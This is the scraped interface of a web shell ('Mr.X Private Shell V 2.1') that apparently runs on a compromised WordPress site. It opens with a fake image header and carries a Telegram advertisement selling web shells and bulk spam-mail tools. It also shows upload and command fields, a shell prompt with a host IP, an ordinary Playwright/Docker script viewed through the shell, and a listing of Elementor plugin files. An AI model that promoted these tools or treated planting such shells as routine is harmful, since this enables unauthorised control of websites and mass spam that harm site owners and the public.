����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
const { spawn, exec } = require( 'child_process' );
const packageJson = require( './package.json' );

function isDockerExist() {
	return new Promise( ( resolve ) => {
		exec( 'docker -v', ( error ) => {
			resolve( ! error );
		} );
	} );
}

async function run( grep ) {
	const playwrightVersion = packageJson.devDependencies[ '@playwright/test' ];
	const workingDir = process.cwd();
	const browsers = process.env.BROWSERS || 'chromium';

	const command = 'docker run';
	const options = [
		'--rm',
		'--network host',
		`--volume ${ workingDir }:/work`,
		'--workdir /work/',
		`--env BROWSERS=${ browsers }`,
		'--interactive',
		process.env.CI ? '' : '--tty',
	];
	const image = `mcr.microsoft.com/playwright:v${ playwrightVersion.replace( '^', '' ) }-jammy`;
	const grepFlag = grep.length ? `--grep="${ grep }"` : '';
	const commandToRun = `/bin/bash -c "npm run test:playwright -- --update-snapshots ${ grepFlag }"`;

	await new Promise( ( resolve, reject ) => {
		const child = spawn( `${ command } ${ options.join( ' ' ) } ${ image } ${ commandToRun }`, {
			stdio: 'inherit',
			shell: true,
		} );

		child.on( 'close', ( code ) => {
			if ( code !== 0 ) {
				reject( new Error( `Docker process exited with code ${ code }` ) );
			} else {
				resolve();
			}
		} );
	} );
}

( async () => {
	if ( ! await isDockerExist() ) {
		// eslint-disable-next-line no-console
		console.error( 'Docker is not installed, please install it first.' );

		process.exit( 1 );
	}

	await run( process.argv.slice( 2 ) );
} )();

Filemanager

Name Type Size Permission Actions
app Folder 0755
assets Folder 0755
core Folder 0755
data Folder 0755
includes Folder 0755
migrations Folder 0755
modules Folder 0755
vendor Folder 0755
vendor_prefixed Folder 0755
CONTRIBUTING.md File 4.71 KB 0644
changelog.txt File 341.72 KB 0644
elementor.php File 4.25 KB 0644
license.txt File 34.32 KB 0644
readme.txt File 29.72 KB 0644
turbo.json File 253 B 0644
update-snapshots-linux.js File 1.49 KB 0644